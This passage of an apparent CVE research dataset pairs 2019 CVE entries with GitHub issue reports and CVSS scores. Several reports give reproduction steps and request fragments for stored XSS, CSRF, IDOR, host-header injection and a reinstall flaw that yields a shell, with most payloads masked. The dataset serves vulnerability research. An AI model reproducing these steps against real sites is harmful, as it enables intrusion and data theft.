  38644. "description": "Bug bounty for security advisory. This is for URLTAG which isn't public at the time of this writing MENTIONTAG thank you so much for reporting this issue!!! We would like to thank you by giving you a NUMBERTAG bug bounty on the project, and this is why I'm creating this ticket (this is to follow our official process to give money). To have more information on our bug bounties program, please read URLTAG",
  38645. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38646. "severity": "CRITICAL",
  38647. "baseScore": 9.8,
  38648. "impactScore": 5.9,
  38649. "exploitabilityScore": 3.9
  38650. },
  38651. {
  38652. "CVE_ID": "CVE-2019-16333",
  38653. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1313",
  38654. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1313",
  38655. "Repo_new": "getsimplecms/getsimplecms",
  38656. "Issue_Created_At": "2019-08-28T13:02:41Z",
  38657. "description": "XSS in FILETAG . Version impacted NUMBERTAG Payload: APITAG FILETAG",
  38658. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38659. "severity": "MEDIUM",
  38660. "baseScore": 5.4,
  38661. "impactScore": 2.7,
  38662. "exploitabilityScore": 2.3
  38663. },
  38664. {
  38665. "CVE_ID": "CVE-2019-16334",
  38666. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1078",
  38667. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1078",
  38668. "Repo_new": "bludit/bludit",
  38669. "Issue_Created_At": "2019-08-29T06:40:10Z",
  38670. "description": "Stored XSS in bludit NUMBERTAG Vulnerability: Bludit NUMBERTAG is vulnerable to a stored XSS in Categories > Add New Category > Name parameter. Steps to reproduce the problem: Go to Categories > Add New Category and insert the following payload in FILETAG FILETAG",
  38671. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  38672. "severity": "MEDIUM",
  38673. "baseScore": 4.8,
  38674. "impactScore": 2.7,
  38675. "exploitabilityScore": 1.7
  38676. },
  38677. {
  38678. "CVE_ID": "CVE-2019-16346",
  38679. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/11",
  38680. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/11",
  38681. "Repo_new": "miniupnp/ngiflib",
  38682. "Issue_Created_At": "2019-04-13T13:37:39Z",
  38683. "description": "heap buffer overflow at APITAG in APITAG Tested in Ubuntu NUMBERTAG bit, ngiflib(master NUMBERTAG bb NUMBERTAG Triggered by APITAG POC file: URLTAG ASAN info: ERRORTAG",
  38684. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  38685. "severity": "HIGH",
  38686. "baseScore": 8.8,
  38687. "impactScore": 5.9,
  38688. "exploitabilityScore": 2.8
  38689. },
  38690. {
  38691. "CVE_ID": "CVE-2019-16347",
  38692. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/12",
  38693. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/12",
  38694. "Repo_new": "miniupnp/ngiflib",
  38695. "Issue_Created_At": "2019-04-13T13:39:52Z",
  38696. "description": "heap buffer overflow at APITAG in APITAG Test in Ubuntu NUMBERTAG bit, ngiflib(master NUMBERTAG bb NUMBERTAG Triggered by APITAG POC file: URLTAG ASAN info: ERRORTAG",
  38697. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  38698. "severity": "HIGH",
  38699. "baseScore": 8.8,
  38700. "impactScore": 5.9,
  38701. "exploitabilityScore": 2.8
  38702. },
  38703. {
  38704. "CVE_ID": "CVE-2019-16348",
  38705. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/24",
  38706. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/24",
  38707. "Repo_new": "marc-q/libwav",
  38708. "Issue_Created_At": "2019-08-15T08:01:41Z",
  38709. "description": "NULL Pointer Dereference in gain_file at APITAG Tested in Ubuntu NUMBERTAG bit, libwav (master NUMBERTAG cc NUMBERTAG Triggered by APITAG POC file: URLTAG ASAN info: ERRORTAG",
  38710. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38711. "severity": "MEDIUM",
  38712. "baseScore": 6.5,
  38713. "impactScore": 3.6,
  38714. "exploitabilityScore": 2.8
  38715. },
  38716. {
  38717. "CVE_ID": "CVE-2019-16349",
  38718. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/422",
  38719. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/422",
  38720. "Repo_new": "axiomatic-systems/bento4",
  38721. "Issue_Created_At": "2019-08-18T06:57:23Z",
  38722. "description": "NULL Pointer Dereference in APITAG at APITAG Tested in Ubuntu NUMBERTAG bit, Bento4(master cbebcc9) Triggered by cmd: APITAG POC file: URLTAG ASAN info: ERRORTAG",
  38723. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38724. "severity": "MEDIUM",
  38725. "baseScore": 5.5,
  38726. "impactScore": 3.6,
  38727. "exploitabilityScore": 1.8
  38728. },
  38729. {
  38730. "CVE_ID": "CVE-2019-16350",
  38731. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/10",
  38732. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/10",
  38733. "Repo_new": "rockcarry/ffjpeg",
  38734. "Issue_Created_At": "2019-08-18T08:03:41Z",
  38735. "description": "NULL Pointer Dereference in APITAG at APITAG Test Environment Ubuntu NUMBERTAG bit, ffjpeg(master cbebcc9) How to trigger NUMBERTAG compile ffjpeg with cmake file from URLTAG NUMBERTAG APITAG POC file URLTAG Details Asan report ERRORTAG GDB report CODETAG",
  38736. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38737. "severity": "MEDIUM",
  38738. "baseScore": 6.5,
  38739. "impactScore": 3.6,
  38740. "exploitabilityScore": 2.8
  38741. },
  38742. {
  38743. "CVE_ID": "CVE-2019-16351",
  38744. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/11",
  38745. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/11",
  38746. "Repo_new": "rockcarry/ffjpeg",
  38747. "Issue_Created_At": "2019-08-18T08:04:59Z",
  38748. "description": "SEGV in APITAG at APITAG Test Environment Ubuntu NUMBERTAG bit, ffjpeg(master cbebcc9) How to trigger NUMBERTAG compile ffjpeg with cmake file from URLTAG NUMBERTAG APITAG POC file URLTAG Details Asan report ERRORTAG GDB report CODETAG",
  38749. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38750. "severity": "MEDIUM",
  38751. "baseScore": 6.5,
  38752. "impactScore": 3.6,
  38753. "exploitabilityScore": 2.8
  38754. },
  38755. {
  38756. "CVE_ID": "CVE-2019-16352",
  38757. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/12",
  38758. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/12",
  38759. "Repo_new": "rockcarry/ffjpeg",
  38760. "Issue_Created_At": "2019-08-18T08:07:01Z",
  38761. "description": "APITAG heap buffer overflow in APITAG at APITAG Test Environment Ubuntu NUMBERTAG bit, ffjpeg(master cbebcc9) How to trigger NUMBERTAG compile ffjpeg with cmake file from URLTAG NUMBERTAG APITAG POC file URLTAG Details Asan report ERRORTAG GDB report ERRORTAG",
  38762. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38763. "severity": "MEDIUM",
  38764. "baseScore": 6.5,
  38765. "impactScore": 3.6,
  38766. "exploitabilityScore": 2.8
  38767. },
  38768. {
  38769. "CVE_ID": "CVE-2019-16354",
  38770. "Issue_Url_old": "https://github.com/astaxie/beego/issues/3763",
  38771. "Issue_Url_new": "https://github.com/astaxie/beego/issues/3763",
  38772. "Repo_new": "astaxie/beego",
  38773. "Issue_Created_At": "2019-08-14T17:35:56Z",
  38774. "description": "File Session Management permission problem. Please answer these questions before submitting your issue. Thanks! Dear beego Team, I would like to report a security vulnerability in Beego's session handling. There is a file permission problem in the File Session Manager that allows any regular (OS) user on the system to access the session folder and potentially read session files. The problem can be found in sess_file.go in the APITAG function, where a folder is created based on the provided sid with a NUMBERTAG permission mask, allowing every user on the system to access the folder and create and remove files. func (fp APITAG APITAG string) APITAG error) { func (fp APITAG APITAG string) APITAG error) { APITAG defer APITAG err := APITAG string(sid NUMBERTAG string(sid NUMBERTAG It later does a stat to see if the session file is there and opens or creates the session file based on that. A race condition could be exploited where a local user creates the file as soon as the folder is created, owning the file and being able to modify it later. Even if that is not achieved, there is still a problem with the file creation. f, err = APITAG string(sid NUMBERTAG string(sid NUMBERTAG sid)) according to the documentation, APITAG creates the named file with mode NUMBERTAG before umask), truncating it if it already exists\", which could also allow a regular user to read the content of the file (again, from inside the operating system). Keep in mind that similar behavior occurs in the APITAG function and should be addressed. However, it's important to note, as the documentation describes, that APITAG will apply the umask to the permission mode. On Ubuntu, for example, that will end up as NUMBERTAG permission (unless someone changes it); that still leaves the file readable and allows other users on the OS to read the file's content. Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you,",
  38775. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  38776. "severity": "MEDIUM",
  38777. "baseScore": 4.7,
  38778. "impactScore": 3.6,
  38779. "exploitabilityScore": 1.0
  38780. },
  38781. {
  38782. "CVE_ID": "CVE-2019-16366",
  38783. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/235",
  38784. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/235",
  38785. "Repo_new": "moddable-opensource/moddable",
  38786. "Issue_Created_At": "2019-07-25T07:08:13Z",
  38787. "description": "XS: Heap Buffer Overflow . Hello, We found a heap buffer overflow vulnerability in XS NUMBERTAG which is reported by Address Sanitizer. We compile and run xs on linu NUMBERTAG The simplified js code: ERRORTAG Output of executing './xst s crash.js' ERRORTAG According to the report, APITAG accesses memory it should not be allowed to. You can get the report too if you compile XS with the fsanitize option, then just run xst with the js. Modify PATHTAG add \" fsanitize=address\" into C_OPTIONS (line NUMBERTAG and LINK_OPTIONS (line NUMBERTAG then make it, and you will get the xst in /lin/debug which has been instrumented with APITAG Built in Security Lab APITAG",
  38788. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38789. "severity": "CRITICAL",
  38790. "baseScore": 9.8,
  38791. "impactScore": 5.9,
  38792. "exploitabilityScore": 3.9
  38793. },
  38794. {
  38795. "CVE_ID": "CVE-2019-16377",
  38796. "Issue_Url_old": "https://github.com/makandra/consul/issues/49",
  38797. "Issue_Url_new": "https://github.com/makandra/consul/issues/49",
  38798. "Repo_new": "makandra/consul",
  38799. "Issue_Created_At": "2019-09-23T09:40:52Z",
  38800. "description": "Security vulnerability: Multiple powers in one controller are not always checked correctly. We have identified a security issue in consul. When a controller has multiple power directives, the :only and :except options of the last directive are applied to all directives. This can lead to unauthenticated access to certain controller actions. Affected versions NUMBERTAG Fixed versions NUMBERTAG Affected code looks like this: APITAG In this example both the powers :foo and :bar are only checked for the index action. Other actions are left unprotected by power checks. Controllers with a single power directive are unaffected. Controllers where neither power uses :only or :except options are unaffected. This vulnerability has been assigned the CVE identifier CVETAG .",
  38801. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38802. "severity": "CRITICAL",
  38803. "baseScore": 9.8,
  38804. "impactScore": 5.9,
  38805. "exploitabilityScore": 3.9
  38806. },
  38807. {
  38808. "CVE_ID": "CVE-2019-16403",
  38809. "Issue_Url_old": "https://github.com/bagisto/bagisto/issues/749",
  38810. "Issue_Url_new": "https://github.com/bagisto/bagisto/issues/749",
  38811. "Repo_new": "bagisto/bagisto",
  38812. "Issue_Created_At": "2019-03-27T12:52:24Z",
  38813. "description": "Broken access control (IDOR). Threat: sensitive data disclosure Risk level: HIGH Complexity: medium Vulnerable functions: Bagisto front end The functionality listed below is designed for customers to change their own values such as address, review, etc., but can also be manipulated by other customers NUMBERTAG Address field: PATHTAG item_value NUMBERTAG Review: PATHTAG item_value NUMBERTAG Orders: PATHTAG item_value ] Tool used: Burp proxy (to manipulate requests) Steps to reproduce the attack NUMBERTAG Address field: step NUMBERTAG create two users user NUMBERTAG EMAILTAG user NUMBERTAG EMAILTAG (default user on demo) step NUMBERTAG Add multiple addresses to both users and note their ids. step NUMBERTAG Edit the address using another user's address id, which will show you the address of that user. User1 can PATHTAG the address of User2 and vice versa. Similarly, the same technique can be used to exploit other functions NUMBERTAG Product review: the review id can be changed to another user's review id to delete a review made by another user NUMBERTAG Orders: the order id can be changed to view orders made by another user. Impact of the vulnerability: sensitive data disclosure, where a user can easily view another user's data, because object ids are not checked against the authenticated customer. Reference: URLTAG FILETAG",
  38814. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  38815. "severity": "HIGH",
  38816. "baseScore": 8.8,
  38817. "impactScore": 5.9,
  38818. "exploitabilityScore": 2.8
  38819. },
  38820. {
  38821. "CVE_ID": "CVE-2019-16510",
  38822. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/164",
  38823. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/164",
  38824. "Repo_new": "mz-automation/libiec61850",
  38825. "Issue_Created_At": "2019-09-09T18:14:27Z",
  38826. "description": "Heap use after free in server_example_goose. Hello, we found a heap use-after-free vulnerability in the server_example_goose binary. Below are the steps followed to reproduce the crash: Download the latest source code from : FILETAG and compile using ASAN (cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address fsanitize=leak g ggdb fno omit frame pointer static libstdc++ static libasan\" DCMAKE_C_FLAGS=\" fsanitize=address fsanitize=leak g ggdb fno omit frame pointer static libstdc++ static libasan\") GDB Output ERRORTAG ASAN Output ERRORTAG",
  38827. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38828. "severity": "HIGH",
  38829. "baseScore": 7.5,
  38830. "impactScore": 3.6,
  38831. "exploitabilityScore": 3.9
  38832. },
  38833. {
  38834. "CVE_ID": "CVE-2019-16520",
  38835. "Issue_Url_old": "https://github.com/semperfiwebdesign/all-in-one-seo-pack/issues/2888",
  38836. "Issue_Url_new": "https://github.com/awesomemotive/all-in-one-seo-pack/issues/2888",
  38837. "Repo_new": "awesomemotive/all-in-one-seo-pack",
  38838. "Issue_Created_At": "2019-09-10T13:25:27Z",
  38839. "description": "Escape meta description output.",
  38840. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38841. "severity": "MEDIUM",
  38842. "baseScore": 5.4,
  38843. "impactScore": 2.7,
  38844. "exploitabilityScore": 2.3
  38845. },
  38846. {
  38847. "CVE_ID": "CVE-2019-16532",
  38848. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/28",
  38849. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/28",
  38850. "Repo_new": "yzmcms/yzmcms",
  38851. "Issue_Created_At": "2019-09-22T05:40:02Z",
  38852. "description": "About APITAG NUMBERTAG APITAG Header Injection. Host header injection vulnerability found on APITAG NUMBERTAG Using this attack, a malicious user can poison the web cache or arbitrary user re direction. APITAG Test Environment: Windows NUMBERTAG SP NUMBERTAG bit) XAMPP NUMBERTAG APITAG NUMBERTAG Access Path: PATHTAG root APITAG curl URLTAG H APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG {padding NUMBERTAG margin NUMBERTAG body{background: fff;color NUMBERTAG font APITAG APITAG Sans APITAG APITAG Micro APITAG serif;} msg{border NUMBERTAG px solid APITAG NUMBERTAG p NUMBERTAG px;padding NUMBERTAG px;line height NUMBERTAG px;text align:center;font size NUMBERTAG px;background: fff;} msgtit{height NUMBERTAG px;line height NUMBERTAG px;color: fff;background NUMBERTAG eb NUMBERTAG e;} msgbody{margin NUMBERTAG p NUMBERTAG text align:center} info{margin bottom NUMBERTAG px;} msgbody p{font size NUMBERTAG px;} msgbody p a{font size NUMBERTAG px;color NUMBERTAG text decoration:none;} msgbody p a:hover{color NUMBERTAG a NUMBERTAG de;} APITAG APITAG APITAG APITAG APITAG \u63d0\u793a\u4fe1\u606f APITAG APITAG APITAG \u8bf7\u5148\u767b\u5f55\uff01 APITAG APITAG \u672c\u9875\u9762\u5c06\u5728 APITAG NUMBERTAG APITAG \u79d2\u540e\u8df3\u8f6c... APITAG APITAG APITAG APITAG APITAG root APITAG FILETAG Or if we capture this in burp: FILETAG Then follow redirection FILETAG This will be re directed to APITAG with ERRORTAG responds. Capture the responds and open the browser will show following: FILETAG",
  38853. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38854. "severity": "MEDIUM",
  38855. "baseScore": 6.1,
  38856. "impactScore": 2.7,
  38857. "exploitabilityScore": 2.8
  38858. },
  38859. {
  38860. "CVE_ID": "CVE-2019-16642",
  38861. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/6",
  38862. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/6",
  38863. "Repo_new": "yeyinshi/tuzicms",
  38864. "Issue_Created_At": "2019-09-17T04:45:42Z",
  38865. "description": "tuzicms APITAG I can't insert image to github NUMBERTAG PATHTAG ERRORTAG line NUMBERTAG and line NUMBERTAG This is a APITAG EXP: APITAG NUMBERTAG PATHTAG ERRORTAG line NUMBERTAG and line NUMBERTAG is a APITAG EXP: APITAG",
  38866. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38867. "severity": "CRITICAL",
  38868. "baseScore": 9.8,
  38869. "impactScore": 5.9,
  38870. "exploitabilityScore": 3.9
  38871. },
  38872. {
  38873. "CVE_ID": "CVE-2019-16643",
  38874. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/54",
  38875. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/54",
  38876. "Repo_new": "94fzb/zrlog",
  38877. "Issue_Created_At": "2019-09-20T01:05:24Z",
  38878. "description": "There is a stored XSS in the article_edit area.",
  38879. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38880. "severity": "MEDIUM",
  38881. "baseScore": 5.4,
  38882. "impactScore": 2.7,
  38883. "exploitabilityScore": 2.3
  38884. },
  38885. {
  38886. "CVE_ID": "CVE-2019-16655",
  38887. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/441",
  38888. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/441",
  38889. "Repo_new": "joyplus/joyplus-cms",
  38890. "Issue_Created_At": "2019-09-03T04:56:06Z",
  38891. "description": "joyplus APITAG is a reload vulnerability in CMS NUMBERTAG describe\uff1a There is a reload vulnerability in APITAG the installation file was not deleted\u3002An attacker can overwrite the original system database and content by reinstalling the system\u3002 url\uff1a URLTAG NUMBERTAG main body First open install FILETAG stand alone next FILETAG Re enter yourself data FILETAG end\uff0creload vulnerability FILETAG NUMBERTAG Code audit The deletion was commented by the author. FILETAG",
  38892. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  38893. "severity": "HIGH",
  38894. "baseScore": 7.5,
  38895. "impactScore": 3.6,
  38896. "exploitabilityScore": 3.9
  38897. },
  38898. {
  38899. "CVE_ID": "CVE-2019-16656",
  38900. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/442",
  38901. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/442",
  38902. "Repo_new": "joyplus/joyplus-cms",
  38903. "Issue_Created_At": "2019-09-03T05:29:10Z",
  38904. "description": "joyplus cms has code execution FILETAG NUMBERTAG describe\uff1a Code execution is possible due to a system reload (reinstallation) vulnerability\u3002 This vulnerability can be used to get a shell. url\uff1a URLTAG NUMBERTAG main body First create a database name\uff0cthe name is APITAG FILETAG Define the database name using the system reload vulnerability and proceed to the next step FILETAG Back to the previous step Enter the payload again; the payload is APITAG APITAG \" and proceed to the next step FILETAG end FILETAG NUMBERTAG Code audit FILETAG",
  38905. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38906. "severity": "CRITICAL",
  38907. "baseScore": 9.8,
  38908. "impactScore": 5.9,
  38909. "exploitabilityScore": 3.9
  38910. },
  38911. {
  38912. "CVE_ID": "CVE-2019-16657",
  38913. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/5",
  38914. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/5",
  38915. "Repo_new": "yeyinshi/tuzicms",
  38916. "Issue_Created_At": "2019-09-03T08:02:42Z",
  38917. "description": "tuzicms PATHTAG has xss NUMBERTAG tuzicms PATHTAG has xss NUMBERTAG PATHTAG (\"dudu\") PATHTAG NUMBERTAG end FILETAG",
  38918. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38919. "severity": "MEDIUM",
  38920. "baseScore": 6.1,
  38921. "impactScore": 2.7,
  38922. "exploitabilityScore": 2.8
  38923. },
  38924. {
  38925. "CVE_ID": "CVE-2019-16658",
  38926. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/4",
  38927. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/4",
  38928. "Repo_new": "yeyinshi/tuzicms",
  38929. "Issue_Created_At": "2019-09-03T07:52:11Z",
  38930. "description": "tuzicms PATHTAG Cross-site Request Forgery exists in the announcement management page under general management NUMBERTAG Cross-site Request Forgery exists in the announcement management page under general management PATHTAG FILETAG NUMBERTAG payload\uff1a CODETAG NUMBERTAG end FILETAG",
  38931. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  38932. "severity": "HIGH",
  38933. "baseScore": 8.8,
  38934. "impactScore": 5.9,
  38935. "exploitabilityScore": 2.8
  38936. },
  38937. {
  38938. "CVE_ID": "CVE-2019-16659",
  38939. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/3",
  38940. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/3",
  38941. "Repo_new": "yeyinshi/tuzicms",
  38942. "Issue_Created_At": "2019-09-03T07:47:24Z",
  38943. "description": "APITAG site Request Forgery exists in routinely managed friendship links NUMBERTAG APITAG site Request Forgery exists in routinely managed friendship links FILETAG NUMBERTAG payload: CODETAG NUMBERTAG end FILETAG",
  38944. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  38945. "severity": "HIGH",
  38946. "baseScore": 8.8,
  38947. "impactScore": 5.9,
  38948. "exploitabilityScore": 2.8
  38949. },
  38950. {
  38951. "CVE_ID": "CVE-2019-16660",
  38952. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/440",
  38953. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/440",
  38954. "Repo_new": "joyplus/joyplus-cms",
  38955. "Issue_Created_At": "2019-09-03T04:37:51Z",
  38956. "description": "joyplus cms Cross site Request Forgery exists in the Player Management Office of System Management NUMBERTAG Cross site Request Forgery exists in the Player Management Office of System Management APITAG FILETAG payload\uff1a CODETAG end: FILETAG",
  38957. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  38958. "severity": "HIGH",
  38959. "baseScore": 8.8,
  38960. "impactScore": 5.9,
  38961. "exploitabilityScore": 2.8
  38962. },
  38963. {
  38964. "CVE_ID": "CVE-2019-16661",
  38965. "Issue_Url_old": "https://github.com/n00dles/ogma-CMS/issues/42",
  38966. "Issue_Url_new": "https://github.com/n00dles/ogma-cms/issues/42",
  38967. "Repo_new": "n00dles/ogma-CMS",
  38968. "Issue_Created_At": "2019-09-20T05:35:42Z",
  38969. "description": "APITAG in ogma CMS NUMBERTAG iew Blogs Create New Blog Post. Affected software: ogma CMS NUMBERTAG Type of vulnerability: XSS APITAG APITAG Blogs Create New Blog Post has APITAG payload\uff1a\"> APITAG alert NUMBERTAG APITAG aaaa click Create New Blog Post FILETAG Enter the payload in the title of the page FILETAG save FILETAG Access page\uff1a URLTAG FILETAG Success",
  38970. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38971. "severity": "MEDIUM",
  38972. "baseScore": 5.4,
  38973. "impactScore": 2.7,
  38974. "exploitabilityScore": 2.3
  38975. },
  38976. {
  38977. "CVE_ID": "CVE-2019-16664",
  38978. "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/20",
  38979. "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/20",
  38980. "Repo_new": "thinksaas/thinksaas",
  38981. "Issue_Created_At": "2019-09-21T13:23:47Z",
  38982. "description": "Stored xss when administrator edits posts in the same group, or just clicks a URL. Stored xss when administrator edits posts in the same group, or just clicks a URL APITAG Ways to reproduce NUMBERTAG admin1 creates a new group with the following request; notice that the malicious code has been injected in the groupname param. APITAG POST APITAG HTTP NUMBERTAG Host: youdomain User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Cookie: Connection: close Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"groupname\" APITAG NUMBERTAG Content Disposition: form data; name=\"groupdesc\" aaaaaaaaaaaaaaa NUMBERTAG Content Disposition: form data; name=\"photo\"; filename=\"\" Content Type: application/octet stream NUMBERTAG Content Disposition: form data; name=\"tag\" aaaaaaaaaaaaaaa NUMBERTAG Content Disposition: form data; name=\"token\" APITAG NUMBERTAG admin1 invites admin2 as an administrator of this new group and posts anything. PS: without the invitee's consent, one can invite anyone as a group administrator. APITAG NUMBERTAG once admin2 edits any post in this group, or just clicks: URLTAG APITAG admin2 would execute the js code which had been injected in the group name NUMBERTAG admin2\u7ba1\u7406\u7ec4\u5185\u5e16\u5b50\u65f6\uff0c\u6216\u53ea\u662f\u70b9\u51fburl\uff1a URLTAG {\u4f60\u7684topic id\uff0c\u5f88\u5bb9\u6613\u83b7\u53d6} admin2\u5c06\u6267\u884c\u5df2\u7ecf\u88ab\u5d4c\u5165groupname\u4e2d\u7684js\u4ee3\u7801",
  38983. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  38984. "severity": "MEDIUM",
  38985. "baseScore": 4.8,
  38986. "impactScore": 2.7,
  38987. "exploitabilityScore": 1.7
  38988. },
  38989. {
  38990. "CVE_ID": "CVE-2019-16665",
  38991. "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/21",
  38992. "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/21",
  38993. "Repo_new": "thinksaas/thinksaas",
  38994. "Issue_Created_At": "2019-09-21T13:26:46Z",
  38995. "description": "Stored XSS in comments post. Stored XSS in comments post \u53d1\u8868\u8bc4\u8bba\u5904\u5b58\u50a8\u578bxss The comment part is vulnerable to XSS via JavaScript injected in an SVG element, through which malicious JavaScript may get executed. APITAG Ways to reproduce NUMBERTAG comment on any post with malicious js code injected, like the following NUMBERTAG POST APITAG HTTP NUMBERTAG Host: youdomain User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Referer: URLTAG Content Length NUMBERTAG Cookie: Connection: close content= APITAG APITAG NUMBERTAG an alert box would pop up, showing that the js code has been executed NUMBERTAG js\u4ee3\u7801\u5df2\u7ecf\u6210\u529f\u6267\u884c",
  38996. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38997. "severity": "MEDIUM",
  38998. "baseScore": 6.1,
  38999. "impactScore": 2.7,
  39000. "exploitabilityScore": 2.8
  39001. },
  39002. {
  39003. "CVE_ID": "CVE-2019-16669",
  39004. "Issue_Url_old": "https://github.com/pagekit/pagekit/issues/935",
  39005. "Issue_Url_new": "https://github.com/pagekit/pagekit/issues/935",
  39006. "Repo_new": "pagekit/pagekit",
  39007. "Issue_Created_At": "2019-09-18T08:14:46Z",
  39008. "description": "Security issue Pagekit's request password feature allows user account enumeration. APITAG Problem Hi, When a user is requesting to reset his password using a valid email account, Pagekit gives the following response. FILETAG However, when an invalid email account is submitted, Pagekit notifies the user that the particular email account cannot be found. FILETAG Leveraging this, an attacker can use a list of emails to enumerate the valid user accounts based on the response of the server. Recommendation: It is recommended to give a generic response when the user inputs his email address for recovery, e.g. \"If this email exists, you will receive an email with the reset instructions.\", in order to prevent user account enumeration. OWASP ref: URLTAG Technical Details Pagekit version NUMBERTAG Webserver: APITAG Database: APITAG PHP Version NUMBERTAG",
  39009. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  39010. "severity": "MEDIUM",
  39011. "baseScore": 5.3,
  39012. "impactScore": 1.4,
  39013. "exploitabilityScore": 3.9
  39014. },
